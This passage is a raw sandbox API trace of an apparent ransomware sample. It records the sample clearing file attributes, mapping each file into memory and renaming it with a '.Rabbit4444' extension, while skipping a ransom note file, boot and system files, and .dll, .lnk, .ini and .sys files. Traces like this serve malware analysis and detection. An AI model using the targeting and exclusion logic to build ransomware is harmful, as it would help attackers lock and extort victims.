(lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="boot") returned 1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.198] lstrcmpiW (lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.198] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms" | out: lpString1="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms") returned="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms" [0059.198] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.198] lstrlenW (lpString="Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms") returned 64 [0059.198] lstrlenW (lpString="Rabbit4444") returned 10 [0059.198] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.198] lstrlenW (lpString=".dll") returned 4 [0059.198] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.198] lstrlenW (lpString=".lnk") returned 4 [0059.198] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.198] lstrlenW (lpString=".ini") returned 4 [0059.199] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.199] lstrlenW (lpString=".sys") returned 4 [0059.199] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.199] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{944a41b9-c0fd-41ae-a6df-5ac4fe5a59b4}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.199] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.199] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15050967827) returned 1 [0059.199] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=959) returned 1 [0059.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.199] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.200] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.201] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.201] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.201] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.201] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.201] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15051225324) returned 1 [0059.202] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.202] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.202] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.202] CloseHandle (hObject=0x298) returned 1 [0059.202] CloseHandle (hObject=0x278) returned 1 [0059.202] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms.Rabbit4444") returned 192 [0059.202] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{944a41b9-c0fd-41ae-a6df-5ac4fe5a59b4}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{944a41b9-c0fd-41ae-a6df-5ac4fe5a59b4}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.203] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53ca4646, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53ca4646, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231f666f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", cAlternateFileName="CL7CBB~1.SET")) returned 1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2=".") returned 1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="..") returned 1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="windows") returned -1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="boot") returned 1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.203] lstrcmpiW (lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.203] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms" | out: lpString1="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms") returned="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms" [0059.203] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.203] lstrlenW (lpString="Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms") returned 64 [0059.203] lstrlenW (lpString="Rabbit4444") returned 10 [0059.203] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.203] lstrlenW (lpString=".dll") returned 4 [0059.203] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.203] lstrlenW (lpString=".lnk") returned 4 [0059.203] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.204] lstrlenW (lpString=".ini") returned 4 [0059.204] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.204] lstrlenW (lpString=".sys") returned 4 [0059.204] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.204] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.204] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.204] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15051471067) returned 1 [0059.204] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=956) returned 1 [0059.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0059.204] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.205] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.207] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.207] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.207] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.207] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15051739078) returned 1 [0059.207] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.207] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0059.207] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.207] CloseHandle (hObject=0x298) returned 1 [0059.207] CloseHandle (hObject=0x278) returned 1 [0059.207] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms.Rabbit4444") returned 192 [0059.207] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.208] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53d894cd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53d894cd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x40b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", cAlternateFileName="CL26A1~1.SET")) returned 1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2=".") returned 1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="..") returned 1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="windows") returned -1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="boot") returned 1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.208] lstrcmpiW (lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.208] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms" | out: lpString1="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms") returned="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms" [0059.208] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.208] lstrlenW (lpString="Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms") returned 64 [0059.209] lstrlenW (lpString="Rabbit4444") returned 10 [0059.209] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.209] lstrlenW (lpString=".dll") returned 4 [0059.209] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.209] lstrlenW (lpString=".lnk") returned 4 [0059.209] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.209] lstrlenW (lpString=".ini") returned 4 [0059.209] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.209] lstrlenW (lpString=".sys") returned 4 [0059.209] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.209] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{955e7ffd-4dd9-4124-96fc-86c3c653dd33}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.209] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.209] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15051986570) returned 1 [0059.209] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1035) returned 1 [0059.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0059.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.209] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.211] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.212] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.212] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.212] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.212] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15052261903) returned 1 [0059.212] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0059.212] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.212] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.212] CloseHandle (hObject=0x298) returned 1 [0059.212] CloseHandle (hObject=0x278) returned 1 [0059.212] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms.Rabbit4444") returned 192 [0059.212] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{955e7ffd-4dd9-4124-96fc-86c3c653dd33}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{955e7ffd-4dd9-4124-96fc-86c3c653dd33}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.213] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e944b3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53e944b3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2311185c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", cAlternateFileName="CLA1BD~1.SET")) returned 1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2=".") returned 1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="..") returned 1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="windows") returned -1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="boot") returned 1 [0059.213] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.214] lstrcmpiW (lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.214] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms" | out: lpString1="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms") returned="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms" [0059.214] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.214] lstrlenW (lpString="Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms") returned 64 [0059.214] lstrlenW (lpString="Rabbit4444") returned 10 [0059.214] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.214] lstrlenW (lpString=".dll") returned 4 [0059.214] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.214] lstrlenW (lpString=".lnk") returned 4 [0059.214] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.214] lstrlenW (lpString=".ini") returned 4 [0059.214] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.214] lstrlenW (lpString=".sys") returned 4 [0059.214] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.214] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{96bc4455-fda3-4de2-8b71-9d1953f0b32d}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.214] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.215] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15052529487) returned 1 [0059.215] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=919) returned 1 [0059.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.215] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.215] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, 